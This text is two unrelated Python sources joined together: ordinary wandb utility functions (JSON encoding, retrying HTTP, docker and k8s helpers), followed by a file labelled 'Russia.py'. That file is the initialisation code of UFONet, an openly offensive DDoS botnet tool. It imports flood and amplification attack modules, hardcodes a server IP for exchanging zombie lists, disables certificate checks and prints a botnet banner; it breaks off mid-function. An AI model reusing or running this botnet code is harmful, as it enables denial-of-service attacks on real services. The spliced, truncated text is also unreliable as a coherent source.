elif np and isinstance(obj, np.generic):
obj = obj.item()
return json.JSONEncoder.default(self, obj)
def json_dump_safer(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=WandBJSONEncoder, **kwargs)
def json_dumps_safer(obj, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dumps(obj, cls=WandBJSONEncoder, **kwargs)
# This is used for dumping raw json into files
def json_dump_uncompressed(obj, fp, **kwargs):
"""Convert obj to json, with some extra encodable types."""
return json.dump(obj, fp, cls=JSONEncoderUncompressed, **kwargs)
def json_dumps_safer_history(obj, **kwargs):
"""Convert obj to json, with some extra encodable types, including histograms"""
return json.dumps(obj, cls=WandBHistoryJSONEncoder, **kwargs)
def make_json_if_not_number(v):
"""If v is not a basic type convert it to json."""
if isinstance(v, (float, int)):
return v
return json_dumps_safer(v)
def make_safe_for_json(obj):
"""Replace invalid json floats with strings. Also converts to lists and dicts."""
if isinstance(obj, Mapping):
return {k: make_safe_for_json(v) for k, v in obj.items()}
elif isinstance(obj, str):
# str's are Sequence, so we need to short-circuit
return obj
elif isinstance(obj, Sequence):
return [make_safe_for_json(v) for v in obj]
elif isinstance(obj, float):
# W&B backend and UI handle these strings
if obj != obj: # standard way to check for NaN
return "NaN"
elif obj == float("+inf"):
return "Infinity"
elif obj == float("-inf"):
return "-Infinity"
return obj
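# Worked example (illustrative):
#   make_safe_for_json({"loss": float("nan"), "curve": [1.0, float("inf")]})
#   ->  {"loss": "NaN", "curve": [1.0, "Infinity"]}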
def mkdir_exists_ok(path):
try:
os.makedirs(path)
return True
except OSError as exc:
if exc.errno == errno.EEXIST and os.path.isdir(path):
return False
else:
raise
def no_retry_auth(e):
if hasattr(e, "exception"):
e = e.exception
if not isinstance(e, requests.HTTPError):
return True
# Don't retry bad request errors; raise immediately
if e.response.status_code == 400:
return False
# Retry all non-forbidden/unauthorized/not-found errors.
if e.response.status_code not in (401, 403, 404):
return True
# Crash w/message on forbidden/unauthorized errors.
if e.response.status_code == 401:
raise CommError("Invalid or missing api_key. Run wandb login")
elif wandb.run:
raise CommError("Permission denied to access {}".format(wandb.run.path))
else:
raise CommError("Permission denied, ask the project owner to grant you access")
def request_with_retry(func, *args, **kwargs):
"""Perform a requests http call, retrying with exponential backoff.
Arguments:
func: An http-requesting function to call, like requests.post
max_retries: Maximum retries before giving up. By default we retry 30 times in ~2 hours before dropping the chunk
*args: passed through to func
**kwargs: passed through to func
"""
max_retries = kwargs.pop("max_retries", 30)
retry_callback = kwargs.pop("retry_callback", None)
sleep = 2
retry_count = 0
while True:
try:
response = func(*args, **kwargs)
response.raise_for_status()
return response
except (
requests.exceptions.ConnectionError,
requests.exceptions.HTTPError,
requests.exceptions.Timeout,
) as e:
if isinstance(e, requests.exceptions.HTTPError):
# Non-retriable HTTP errors.
#
# We retry 500s just to be cautious, and because the back end
# returns them when there are infrastructure issues. If retrying
# some request winds up being problematic, we'll change the
# back end to indicate that it shouldn't be retried.
if (
e.response is not None
and e.response.status_code in {400, 403, 404, 409}
) or (
e.response is not None
and e.response.status_code == 500
and e.response.content == b'{"error":"context deadline exceeded"}\n'
):
return e
if retry_count == max_retries:
return e
retry_count += 1
delay = sleep + random.random() * 0.25 * sleep
if isinstance(e, requests.exceptions.HTTPError) and (
e.response is not None and e.response.status_code == 429
):
err_str = "Filestream rate limit exceeded, retrying in {} seconds".format(
delay
)
if retry_callback:
retry_callback(e.response.status_code, err_str)
logger.info(err_str)
else:
pass
logger.warning(
"requests_with_retry encountered retryable exception: %s. func: %s, args: %s, kwargs: %s",
e,
func,
args,
kwargs,
)
time.sleep(delay)
sleep *= 2
if sleep > MAX_SLEEP_SECONDS:
sleep = MAX_SLEEP_SECONDS
        except requests.exceptions.RequestException as e:
            # `response` may be unbound here if func() itself raised, so read the error
            # body (if any) from the exception's response instead.
            if e.response is not None:
                try:
                    logger.error(e.response.json()["error"])  # XXX clean this up
                except Exception:
                    pass
            logger.exception(
                "request_with_retry encountered unretryable exception: %s", e
            )
            return e
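# A hedged usage sketch for request_with_retry() above; the endpoint and payload are
# placeholders and the _demo_* helper is not part of the original module.
def _demo_request_with_retry():
    import requests
    # Connection errors, timeouts and retriable HTTP errors are retried with exponential
    # backoff; the helper returns either a Response or the final exception object.
    return request_with_retry(
        requests.post,
        "https://example.com/api",  # placeholder endpoint
        json={"hello": "world"},
        max_retries=3,  # popped by the helper before calling requests.post
    )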
def find_runner(program):
"""Return a command that will run program.
Arguments:
program: The string name of the program to try to run.
Returns:
commandline list of strings to run the program (eg. with subprocess.call()) or None
"""
if os.path.isfile(program) and not os.access(program, os.X_OK):
# program is a path to a non-executable file
        try:
            with open(program) as opened:
                first_line = opened.readline().strip()
        except IOError:  # PermissionError doesn't exist in 2.7
            return None
if first_line.startswith("#!"):
return shlex.split(first_line[2:])
if program.endswith(".py"):
return [sys.executable]
return None
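# A self-contained sketch of find_runner() above; the throwaway script is created on the
# fly and the _demo_* helper is not part of the original module.
def _demo_find_runner():
    import tempfile
    with tempfile.NamedTemporaryFile("w", suffix=".sh", delete=False) as f:
        f.write("#!/bin/bash\necho hi\n")
        path = f.name
    # For a non-executable file with a shebang, the shebang is split into a command list.
    runner = find_runner(path)  # e.g. ["/bin/bash"]
    os.remove(path)
    return runner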
def downsample(values, target_length):
"""Downsamples 1d values to target_length, including start and end.
Algorithm just rounds index down.
Values can be any sequence, including a generator.
"""
assert target_length > 1
values = list(values)
if len(values) < target_length:
return values
ratio = float(len(values) - 1) / (target_length - 1)
result = []
for i in range(target_length):
result.append(values[int(i * ratio)])
return result
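# A tiny worked example for downsample() above; the values are arbitrary and the _demo_*
# helper is not part of the original module.
def _demo_downsample():
    # Eleven points down to five, always keeping the first and last values.
    return downsample(range(11), 5)  # -> [0, 2, 5, 7, 10]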
import numbers
def has_num(dictionary, key):
return key in dictionary and isinstance(dictionary[key], numbers.Number)
def md5_file(path):
hash_md5 = hashlib.md5()
with open(path, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return base64.b64encode(hash_md5.digest()).decode("ascii")
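# A self-contained sketch of md5_file() above, using a throwaway file; the _demo_* helper
# is not part of the original module.
def _demo_md5_file():
    import tempfile
    with tempfile.NamedTemporaryFile("wb", delete=False) as f:
        f.write(b"hello world")
        path = f.name
    digest = md5_file(path)  # base64-encoded MD5 digest: "XrY7u+Ae7tCTyyK7j1rNww=="
    os.remove(path)
    return digest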
def get_log_file_path():
"""Log file path used in error messages.
It would probably be better if this pointed to a log file in a
run directory.
"""
# TODO(jhr, cvp): refactor
if wandb.run:
return wandb.run._settings.log_internal
return os.path.join("wandb", "debug-internal.log")
def docker_image_regex(image):
"regex for valid docker image names"
if image:
return re.match(
r"^(?:(?=[^:\/]{1,253})(?!-)[a-zA-Z0-9-]{1,63}(?<!-)(?:\.(?!-)[a-zA-Z0-9-]{1,63}(?<!-))*(?::[0-9]{1,5})?/)?((?![._-])(?:[a-z0-9._-]*)(?<![._-])(?:/(?![._-])[a-z0-9._-]*(?<![._-]))*)(?::(?![.-])[a-zA-Z0-9_.-]{1,128})?$",
image,
)
def image_from_docker_args(args):
"""This scans docker run args and attempts to find the most likely docker image argument.
    It excludes any arguments that start with a dash, and the argument after it if it isn't a boolean
    switch. This can be improved; we currently fall back gracefully when this fails.
"""
bool_args = [
"-t",
"--tty",
"--rm",
"--privileged",
"--oom-kill-disable",
"--no-healthcheck",
"-i",
"--interactive",
"--init",
"--help",
"--detach",
"-d",
"--sig-proxy",
"-it",
"-itd",
]
last_flag = -2
last_arg = ""
possible_images = []
if len(args) > 0 and args[0] == "run":
args.pop(0)
for i, arg in enumerate(args):
if arg.startswith("-"):
last_flag = i
last_arg = arg
elif "@sha256:" in arg:
# Because our regex doesn't match digests
possible_images.append(arg)
elif docker_image_regex(arg):
if last_flag == i - 2:
possible_images.append(arg)
elif "=" in last_arg:
possible_images.append(arg)
elif last_arg in bool_args and last_flag == i - 1:
possible_images.append(arg)
most_likely = None
for img in possible_images:
if ":" in img or "@" in img or "/" in img:
most_likely = img
break
    if most_likely is None and len(possible_images) > 0:
most_likely = possible_images[0]
return most_likely
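# A hypothetical example of image_from_docker_args() above; the argument list mirrors a
# typical `docker run` invocation and the _demo_* helper is not part of the original module.
def _demo_image_from_docker_args():
    args = ["run", "--rm", "-it", "-e", "FOO=bar", "ubuntu:20.04", "bash"]
    # Flags and their values are skipped, leaving "ubuntu:20.04" as the most likely image.
    return image_from_docker_args(args)  # -> "ubuntu:20.04"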
def load_yaml(file):
"""If pyyaml > 5.1 use full_load to avoid warning"""
if hasattr(yaml, "full_load"):
return yaml.full_load(file)
else:
return yaml.load(file)
def image_id_from_k8s():
"""Pings the k8s metadata service for the image id. Specify the
KUBERNETES_NAMESPACE environment variable if your pods are not in
the default namespace:
- name: KUBERNETES_NAMESPACE
valueFrom:
fieldRef:
fieldPath: metadata.namespace
"""
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
if os.path.exists(token_path):
k8s_server = "https://{}:{}/api/v1/namespaces/{}/pods/{}".format(
os.getenv("KUBERNETES_SERVICE_HOST"),
os.getenv("KUBERNETES_PORT_443_TCP_PORT"),
os.getenv("KUBERNETES_NAMESPACE", "default"),
os.getenv("HOSTNAME"),
)
try:
res = requests.get(
k8s_server,
verify="/var/run/secrets/kubernetes.io/serviceaccount/ca.crt",
timeout=3,
headers={"Authorization": "Bearer {}".format(open(token_path).read())},
)
res.raise_for_status()
except requests.RequestException:
return None
try:
            image_id = res.json()["status"]["containerStatuses"][0]["imageID"]
            # str.strip() removes any of these characters from both ends rather than the
            # prefix, so drop the "docker-pullable://" prefix explicitly instead.
            if image_id.startswith("docker-pullable://"):
                image_id = image_id[len("docker-pullable://"):]
            return image_id
except (ValueError, KeyError, IndexError):
logger.exception("Error checking kubernetes for image id")
return None
def async_call(target, timeout=None):
"""Accepts a method and optional timeout.
    Returns a new method that will call the original with any args, waiting for up to timeout seconds.
This new method blocks on the original and returns the result or None
if timeout was reached, along with the thread.
You can check thread.is_alive() to determine if a timeout was reached.
If an exception is thrown in the thread, we reraise it.
"""
q = queue.Queue()
def wrapped_target(q, *args, **kwargs):
try:
q.put(target(*args, **kwargs))
except Exception as e:
q.put(e)
def wrapper(*args, **kwargs):
thread = threading.Thread(
target=wrapped_target, args=(q,) + args, kwargs=kwargs
)
thread.daemon = True
thread.start()
try:
result = q.get(True, timeout)
if isinstance(result, Exception):
six.reraise(type(result), result, sys.exc_info()[2])
return result, thread
except queue.Empty:
return None, thread
return wrapper
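# A small usage sketch for async_call() above; the wrapped function and timeout values
# are illustrative and the _demo_* helper is not part of the original module.
def _demo_async_call():
    def slow_add(a, b):
        time.sleep(0.1)
        return a + b
    result, _ = async_call(slow_add, timeout=1)(2, 3)            # result == 5
    timed_out, alive = async_call(slow_add, timeout=0.01)(2, 3)  # timed_out is None
    return result, timed_out, alive.is_alive()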
def read_many_from_queue(q, max_items, queue_timeout):
try:
item = q.get(True, queue_timeout)
except queue.Empty:
return []
items = [item]
for i in range(max_items):
try:
item = q.get_nowait()
except queue.Empty:
return items
items.append(item)
return items
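# A minimal sketch of read_many_from_queue() above using an in-memory queue; the _demo_*
# helper is not part of the original module.
def _demo_read_many_from_queue():
    q = queue.Queue()
    for i in range(5):
        q.put(i)
    # Blocks up to queue_timeout seconds for the first item, then drains up to max_items
    # more without blocking.
    return read_many_from_queue(q, max_items=3, queue_timeout=0.1)  # -> [0, 1, 2, 3]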
def stopwatch_now():
"""Get a timevalue for interval comparisons
When possible it is a monotonic clock to prevent backwards time issues.
"""
if six.PY2:
now = time.time()
else:
now = time.monotonic()
return now
def class_colors(class_count):
# make class 0 black, and the rest equally spaced fully saturated hues
return [[0, 0, 0]] + [
colorsys.hsv_to_rgb(i / (class_count - 1.0), 1.0, 1.0)
for i in range(class_count - 1)
]
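# A tiny illustrative call to class_colors() above; the class count is arbitrary and the
# _demo_* helper is not part of the original module.
def _demo_class_colors():
    # Class 0 is black; the remaining classes get equally spaced, fully saturated hues as
    # (r, g, b) floats in [0, 1].
    return class_colors(3)  # -> [[0, 0, 0], (1.0, 0.0, 0.0), (0.0, 1.0, 1.0)]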
def guess_data_type(shape, risky=False):
"""Infer the type of data based on the shape of the tensors
Arguments:
risky(bool): some guesses are more likely to be wrong.
"""
# (samples,) or (samples,logits)
if len(shape) in (1, 2):
return "label"
# Assume image mask like fashion mnist: (no color channel)
# This is risky because RNNs often have 3 dim tensors: batch, time, channels
if risky and len(shape) == 3:
return "image"
if len(shape) == 4:
if shape[-1] in (1, 3, 4):
# (samples, height, width, Y \ RGB \ RGBA)
return "image"
else:
# (samples, height, width, logits)
return "segmentation_mask"
return None
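# A few illustrative calls to guess_data_type() above; the shapes are made up and the
# _demo_* helper is not part of the original module.
def _demo_guess_data_type():
    assert guess_data_type((32, 10)) == "label"                   # (samples, logits)
    assert guess_data_type((32, 28, 28), risky=True) == "image"   # no color channel
    assert guess_data_type((32, 64, 64, 3)) == "image"            # (samples, h, w, RGB)
    assert guess_data_type((32, 64, 64, 21)) == "segmentation_mask"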
def download_file_from_url(dest_path, source_url, api_key=None):
response = requests.get(source_url, auth=("api", api_key), stream=True, timeout=5)
response.raise_for_status()
if os.sep in dest_path:
mkdir_exists_ok(os.path.dirname(dest_path))
with fsync_open(dest_path, "wb") as file:
for data in response.iter_content(chunk_size=1024):
file.write(data)
def isatty(ob):
return hasattr(ob, "isatty") and ob.isatty()
def to_human_size(bytes, units=None):
units = units or POW_10_BYTES
unit, value = units[0]
factor = round(float(bytes) / value, 1)
return (
"{}{}".format(factor, unit)
if factor < 1024 or len(units) == 1
else to_human_size(bytes, units[1:])
)
def from_human_size(size, units=None):
units = {unit.upper(): value for (unit, value) in units or POW_10_BYTES}
regex = re.compile(
r"(\d+\.?\d*)\s*({})?".format("|".join(units.keys())), re.IGNORECASE
)
match = re.match(regex, size)
if not match:
raise ValueError("Size must be of the form `10`, `10B` or `10 B`.")
factor, unit = (
float(match.group(1)),
units[match.group(2).upper()] if match.group(2) else 1,
)
return int(factor * unit)
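# An illustrative round trip through to_human_size()/from_human_size() above. It assumes
# POW_10_BYTES (defined elsewhere in this module) is an ordered list of (unit, value)
# pairs such as [("B", 1), ("KB", 10 ** 3), ("MB", 10 ** 6), ...]; the _demo_* helper is
# not part of the original module.
def _demo_human_size():
    pretty = to_human_size(1500000)   # e.g. "1.5MB" under the assumption above
    raw = from_human_size("1.5 MB")   # -> 1500000
    return pretty, raw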
def auto_project_name(program):
# if we're in git, set project name to git repo name + relative path within repo
root_dir = wandb.wandb_sdk.lib.git.GitRepo().root_dir
if root_dir is None:
return "uncategorized"
# On windows, GitRepo returns paths in unix style, but os.path is windows
# style. Coerce here.
root_dir = to_native_slash_path(root_dir)
repo_name = os.path.basename(root_dir)
if program is None:
return repo_name
if not os.path.isabs(program):
program = os.path.join(os.curdir, program)
prog_dir = os.path.dirname(os.path.abspath(program))
if not prog_dir.startswith(root_dir):
return repo_name
project = repo_name
sub_path = os.path.relpath(prog_dir, root_dir)
if sub_path != ".":
project += "-" + sub_path
return project.replace(os.sep, "_")
def parse_sweep_id(parts_dict):
"""In place parse sweep path from parts dict.
Arguments:
parts_dict (dict): dict(entity=,project=,name=). Modifies dict inplace.
Returns:
None or str if there is an error
"""
entity = None
project = None
sweep_id = parts_dict.get("name")
if not isinstance(sweep_id, six.string_types):
return "Expected string sweep_id"
sweep_split = sweep_id.split("/")
if len(sweep_split) == 1:
pass
elif len(sweep_split) == 2:
split_project, sweep_id = sweep_split
project = split_project or project
elif len(sweep_split) == 3:
split_entity, split_project, sweep_id = sweep_split
project = split_project or project
entity = split_entity or entity
else:
return (
"Expected sweep_id in form of sweep, project/sweep, or entity/project/sweep"
)
parts_dict.update(dict(name=sweep_id, project=project, entity=entity))
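# A small worked example for parse_sweep_id() above; the entity, project and sweep names
# are placeholders and the _demo_* helper is not part of the original module.
def _demo_parse_sweep_id():
    parts = dict(entity=None, project=None, name="my-team/my-project/abc123")
    err = parse_sweep_id(parts)  # returns None on success, an error string otherwise
    # parts is modified in place:
    # {"name": "abc123", "project": "my-project", "entity": "my-team"}
    return err, parts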
def to_forward_slash_path(path):
if platform.system() == "Windows":
path = path.replace("\\", "/")
return path
def to_native_slash_path(path):
return path.replace("/", os.sep)
def bytes_to_hex(bytestr):
# Works in python2 / python3
return codecs.getencoder("hex")(bytestr)[0].decode("ascii")
def check_and_warn_old(files):
if "wandb-metadata.json" in files:
wandb.termwarn("These runs were logged with a previous version of wandb.")
wandb.termwarn(
"Run pip install wandb<0.10.0 to get the old library and sync your runs."
)
return True
return False
class ImportMetaHook:
def __init__(self):
self.modules = {}
self.on_import = {}
def add(self, fullname, on_import):
self.on_import.setdefault(fullname, []).append(on_import)
def install(self):
sys.meta_path.insert(0, self)
def uninstall(self):
sys.meta_path.remove(self)
def find_module(self, fullname, path=None):
if fullname in self.on_import:
return self
def load_module(self, fullname):
self.uninstall()
mod = importlib.import_module(fullname)
self.install()
self.modules[fullname] = mod
on_imports = self.on_import.get(fullname)
if on_imports:
for f in on_imports:
f()
return mod
def get_modules(self):
return tuple(self.modules)
def get_module(self, module):
return self.modules[module]
_import_hook = None
def add_import_hook(fullname, on_import):
global _import_hook
if _import_hook is None:
_import_hook = ImportMetaHook()
_import_hook.install()
_import_hook.add(fullname, on_import)
def b64_to_hex_id(id_string):
return binascii.hexlify(base64.standard_b64decode(str(id_string))).decode("utf-8")
def hex_to_b64_id(encoded_string):
return base64.standard_b64encode(binascii.unhexlify(encoded_string)).decode("utf-8")
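# A quick round-trip sketch for b64_to_hex_id()/hex_to_b64_id() above; the id bytes are
# arbitrary and the _demo_* helper is not part of the original module.
def _demo_id_round_trip():
    b64_id = base64.standard_b64encode(b"\x12\x34\xab\xcd").decode("utf-8")  # "EjSrzQ=="
    hex_id = b64_to_hex_id(b64_id)  # -> "1234abcd"
    return hex_to_b64_id(hex_id) == b64_id  # -> True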
def host_from_path(path):
"""returns the host of the path"""
url = urlparse(path)
return url.netloc
def uri_from_path(path):
"""returns the URI of the path"""
url = urlparse(path)
return url.path if url.path[0] != "/" else url.path[1:]
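# A small illustrative check of host_from_path()/uri_from_path() above; the URL is a
# placeholder and the _demo_* helper is not part of the original module.
def _demo_path_parsing():
    path = "https://api.wandb.ai/files/run"
    assert host_from_path(path) == "api.wandb.ai"
    assert uri_from_path(path) == "files/run"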
def _has_internet():
"""Attempts to open a DNS connection to Googles root servers"""
try:
s = socket.create_connection(("8.8.8.8", 53), 0.5)
s.close()
return True
except OSError:
return False
def rand_alphanumeric(length=8, rand=None):
rand = rand or random
return "".join(rand.choice("0123456789ABCDEF") for _ in range(length))
@contextlib.contextmanager
def fsync_open(path, mode="w"):
"""
Opens a path for I/O, guaranteeing that the file is flushed and
fsynced when the file's context expires.
"""
with open(path, mode) as f:
yield f
f.flush()
os.fsync(f.fileno())
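# A short usage sketch for the fsync_open() context manager above; the file path is a
# throwaway and the _demo_* helper is not part of the original module.
def _demo_fsync_open():
    import tempfile
    path = os.path.join(tempfile.mkdtemp(), "example.txt")
    # The file is flushed and fsynced to disk before the context manager exits.
    with fsync_open(path) as f:
        f.write("durable write\n")
    return path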
def _is_kaggle():
return (
os.getenv("KAGGLE_KERNEL_RUN_TYPE") is not None
or "kaggle_environments" in sys.modules # noqa: W503
)
def _is_likely_kaggle():
# Telemetry to mark first runs from Kagglers.
return (
_is_kaggle()
or os.path.exists(
os.path.expanduser(os.path.join("~", ".kaggle", "kaggle.json"))
)
or "kaggle" in sys.modules
)
def _is_databricks():
# check if we are running inside a databricks notebook by
# inspecting sys.modules, searching for dbutils and verifying that
# it has the appropriate structure
if "dbutils" in sys.modules:
dbutils = sys.modules["dbutils"]
if hasattr(dbutils, "shell"):
shell = dbutils.shell
if hasattr(shell, "sc"):
sc = shell.sc
return sc.appName == "Databricks Shell"
return False
Russia.py
import os, sys, re, traceback, random, time, threading, base64, string, math
import io, socket, ssl, cgi, json, gzip
try:
from urllib.parse import urlparse as urlparse
except:
from urlparse import urlparse as urlparse
try:
import urllib.request, urllib.error, urllib.parse
except:
print ("\nRussia needs to fall, Swifty Bois.\n")
sys.exit()
from uuid import getnode
from random import randrange, shuffle
from .options import UFONetOptions
from .update import Updater
from .herd import Herd
from .zombie import Zombie
from .doll import Doll
from core.tools.inspector import Inspector
from core.tools.abductor import Abductor
from core.tools.ufoscan import UFOSCAN
from core.mods.loic import LOIC
from core.mods.loris import LORIS
from core.mods.ufosyn import UFOSYN
from core.mods.spray import SPRAY
from core.mods.smurf import SMURF
from core.mods.xmas import XMAS
from core.mods.nuke import NUKE
from core.mods.tachyon import TACHYON
from core.mods.monlist import MONLIST
from core.mods.sniper import SNIPER
from core.mods.ufoack import UFOACK
from core.mods.uforst import UFORST
from core.mods.droper import DROPER
from core.mods.overlap import OVERLAP
from core.mods.pinger import PINGER
from core.mods.ufoudp import UFOUDP
from core.mods.fraggle import FRAGGLE
DEBUG = False # use 'True' for detailed traceback
class UFONet(object):
def __init__(self):
self.exit_msg = 'Donate BTC (Bitcoin) to keep UFONet (https://ufonet.03c8.net) strong!' # set msg show at the end [FILO ;-)]
self.blackhole = '46.163.118.220' # default download/upload zombies [Blackhole] [Server] / Try [DIY] your own [Mirror]...
        self.GIT_REPOSITORY = 'https://code.03c8.net/epsylon/ufonet' # official code source [OK! 22/12/2018]
self.GIT_REPOSITORY2 = 'https://github.com/epsylon/ufonet' # mirror source [since: 04/06/2018]
self.github_zombies = 'https://raw.githubusercontent.com/epsylon/ufonet/master/botnet/' # default [RAW] download/upload zombies [Blackhole] [GitHub] [DIY]
self.external_check_service1 = 'https://status.ws/' # set external check service 1 [OK! 26/02/2020]
self.external_check_service2 = 'https://downforeveryoneorjustme.com/' # set external check service 2 [OK! 26/02/2020]
self.check_tor_url = 'https://check.torproject.org/' # TOR status checking site
self.check_ip_service1 = 'https://checkip.org/' # set external check ip service 1 [OK! 06/06/2020]
self.check_ip_service2 = 'https://whatismyip.org/' # set external check ip service 2 [OK! 06/06/2020]
        self.check_ip_service3 = 'https://ip.42.pl/ra' # set external check ip service 3 [OK! 06/06/2020]
self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
self.motherships_file = 'core/txt/motherships.txt' # set source path to retrieve mothership names
self.zombies_file = 'botnet/zombies.txt' # set source path to retrieve [Zombies]
self.aliens_file = 'botnet/aliens.txt' # set source path to retrieve [Aliens]
self.dnss_file = 'botnet/dns.txt' # set source path to retrieve [DNSs]
self.droids_file = 'botnet/droids.txt' # set source path to retrieve [Droids]
self.ucavs_file = 'botnet/ucavs.txt' # set source path to retrieve 'ucavs'
self.rpcs_file = 'botnet/rpcs.txt' # set source path to retrieve 'rpcs'
self.ntps_file = 'botnet/ntp.txt' # set source path to retrieve [NTPs]
self.snmps_file = 'botnet/snmp.txt' # set source path to retrieve [SNMPs]
self.humans_file = 'botnet/humans.txt' # set source path to retrieve 'humans'
self.dorks_file = 'botnet/dorks.txt' # set source path to retrieve [Dorks]
self.mothership_stats_file = 'core/json/stats.json' # set source for mothership stats
self.timeline_file = 'docs/VERSION' # set source for code releases
self.links_file = "data/links.txt" # set source path to retrieve [Blackhole] [Links]
self.streams_file = "data/streams.txt" # set source path to retrieve [Blackhole] [Streams]
self.globalnet_file = "data/globalnet.txt" # set source path to retrieve [Blackhole] [Globalnet]
self.news_file = "data/news.txt" # set source path to retrieve [Blackhole] [News]
self.tv_file = "data/tv.txt" # set source path to retrieve [Blackhole] [TV]
self.missions_file = "data/missions.txt" # set source path to retrieve [Blackhole] [Missions]
self.board_file = "data/board.txt" # set source path to retrieve [Blackhole] [Board]
self.grid_file = "data/grid.txt" # set source path to retrieve [Blackhole] [Grid]
self.wargames_file = "data/wargames.txt" # set source path to retrieve [Blackhole] [Wargames]
self.examples_file = "docs/examples.txt" # set source path to retrieve [Examples]
self.misc_file = "core/txt/misc.txt" # set source path to retrieve [Miscellania] cites
self.referer = '' # black magic
self.port = "8080" # default injection port
self.mothershipname = "core/txt/shipname.txt"
self.default_mothership_name = "l4m3r-lulz/0\n" # default mothership name
self.mothership_model_file = 'core/txt/model.txt' # set source for mothership model
self.warping_path = '/var/www/ufonet' # set source for warping path
self.warping_folder_permissions = 0o644 # set permission for warping folder
f = open(self.mothership_model_file) # extract mothership model
self.mothership_model = f.readlines()
for model in self.mothership_model:
model = model.rstrip('\n')
self.mothership_model = model
f.close()
self.mothership_baptism() # generating static name/id for your mothership ;-)
self.head = False
self.payload = False
self.external = False
self.attack_mode = False
self.connection_failed = False
self.total_possible_zombies = 0
self.herd = Herd(self)
self.sem = False
self.db_flash = 0 # db stress counter
self.total_aliens = 0
self.aliens_hit = 0
self.aliens_fail = 0
self.total_droids = 0
self.droids_hit = 0
self.droids_fail = 0
self.total_ucavs = 0
self.ucavs_hit = 0
self.ucavs_fail = 0
self.total_rpcs = 0
self.rpcs_hit = 0
self.rpcs_fail = 0
self.total_loic = 0
self.total_loris = 0
self.total_syn = 0
self.total_spray = 0
self.total_smurf = 0
self.total_fraggle = 0
self.total_xmas = 0
self.total_ufoack = 0
self.total_uforst = 0
self.total_droper = 0
self.total_overlap = 0
self.total_pinger = 0
self.total_ufoudp = 0
self.total_nuke = 0
self.total_tachyon = 0
self.total_monlist = 0
self.total_sniper = 0
self.total_zombies_failed_connection = 0
self.ctx = ssl.create_default_context() # creating context to bypass SSL cert validation (black magic)
self.ctx.check_hostname = False
self.ctx.verify_mode = ssl.CERT_NONE
self.nat_error_flag = "OFF"
self.trans_zombies = 0
self.scanned_zombies = 0
self.loadcheck_counter = 0
self.loadcheck_prev_size = None
self.loadcheck_prev_load = None
self.loadcheck_first_size = None
self.loadcheck_first_load = None
self.loadcheck_size_list = []
self.loadcheck_load_list = []
self.loadcheck_size_median = None
self.loadcheck_size_max = None
self.loadcheck_size_min = None
self.loadcheck_load_median = None
self.loadcheck_size_max = None
self.loadcheck_size_min = None
self.num_is_up = 0 # counter for [UCAVs] 'up' reports
self.num_is_down = 0 # counter for [UCAVs] 'down' reports
self.expire_timing = 30 # default expiring time per round
self.extra_zombies_lock = False # used to lock threading flow when [ARMY] is required
self.ac_control = [] # used by 'herd.py' to lock threading flow when [Zombies] are returning
def mothership_baptism(self):
if os.path.exists(self.mothershipname) == True:
f = open(self.mothershipname)
self.mothership_id = f.read()
f.close()
else:
self.mothership_ids = []
try:
f = open(self.motherships_file)
motherships = f.readlines()
f.close()
for ship in motherships:
ship = ship.encode("utf-8")
self.mothership_ids.append(base64.urlsafe_b64encode(ship))
try:
self.mothership_id = str(base64.b64decode(random.choice(self.mothership_ids).strip()), 'utf-8')
except:
try:
self.mothership_id = str(base64.b64decode(random.choice(self.mothership_ids).strip()), 'latin-1')+"\n" # id (hack&slash!) creation ;-)
except:
self.mothership_id = self.default_mothership_name
except:
self.mothership_id = self.default_mothership_name
        if len(str(self.mothership_id.upper())) > 20: # mothership naming anti-cheating! ;-)
self.mothership_id = self.default_mothership_name
m = open(self.mothershipname, "w") # write mothership name to a static file
m.write(str(self.mothership_id.upper()))
m.close()
def create_options(self, args=None):
self.optionParser = UFONetOptions()
self.options = self.optionParser.get_options(args)
if not self.options:
return False
return self.options
def banner_welcome(self):
print(" ____ ")
print(" || / /\ \ || #===============================================#")
print(" -(00)- + (XX) + -(00)- || ||")
print(" || || O ==*~~~~~~*== 0 || || || > Botnet [DDoS] # > Close Combat [DoS] ||")
print(" -(00)- (0) XX (0) -(00)- || ||")
print(" || \| (00) |/ || || |-> ZOMBIES # |-> LOIC ||")
print(" (O)_ (O) 0'----'0 (O) _(O) || |-> DROIDS # |-> LORIS ||")
print(" | |.''.( xx ).''.| | || |-> ALIENS # |-> UFOSYN ||")
print(" .'.' X|'..'|X '.'. || |-> UCAVs # |-> XMAS ||")
print(" .-. .' /'--.__|_00_|__.--'\ '. .-. || |-> X-RPCs # |-> NUKE ||")
print(" (O).)-|0| \ x| ## |x / |0|-(.(O) || |-> DBSTRESS # |-> UFOACK ||")
print(" `-' '-'-._'-./ -00- \.-'_.-'-' `-' || |-> SPRAY # |-> UFORST ||")
print(" _ | || '-.___||___.-' || | _ || |-> SMURF # |-> DROPER ||")
print(" .' _ | ||==O | __ | O==|| | _ '. || |-> TACHYON # |-> OVERLAP ||")
print(" / .' ''.| || | /_00_\ | || |.'' '. \ || |-> MONLIST # |-> PINGER ||")
print(" | '### | =| | ###### | |= |' ### | || |-> FRAGGLE # |-> UFOUDP ||")
print(" | |(0)| '. 0\||__**_ ||/0 .' |(0)| | || |-> SNIPER # ||")
print(" \ '._.' '. | \_##_/ | .' '._.' / || ||")
print(" '.__ ____0_'.|__'--'__|.'_0____ __.' #|=============================================|#")
print(" .'_.-| YY |-._'. || ||")
print(" || -> [ UFONet: https://ufonet.03c8.net ] <- ||")
print(" + Class: PSYoPs / "+str(self.mothership_model)+" + || ||")
print(" #|=============================================|#")
print("")
def banner(self):
print('='*75, "\n")
print("888 888 8888888888 .d88888b. 888b 888 888 ")
print("888 888 888 d88P Y888b 8888b 888 888 ")
print("888 888 888 888 888 88888b 888 888 ")
print("888 888 8888888 888 888 888Y88b 888 .d88b. 888888 ")
print("888 888 888 888 888 888 Y88b888 d8P Y8b 888 ")
print("888 888 888 888 888 888 Y88888 88888888 888 ")
print("Y88b. .d88P 888 Y88b. .d88P 888 Y8888 Y8b. Y88b. ")
print(" 'Y88888P' 888 'Y88888P' 888 Y888 'Y8888 'Y8888")
print(self.optionParser.description, "\n")
print('='*75)
def generate_exit_msg(self):
self.exit_msg = "Generating random exit... \n\n"
try:
f = open(self.misc_file)
m = f.readlines()
f.close()
self.exit_msg += " -> "+str(random.choice(m).strip())
except:
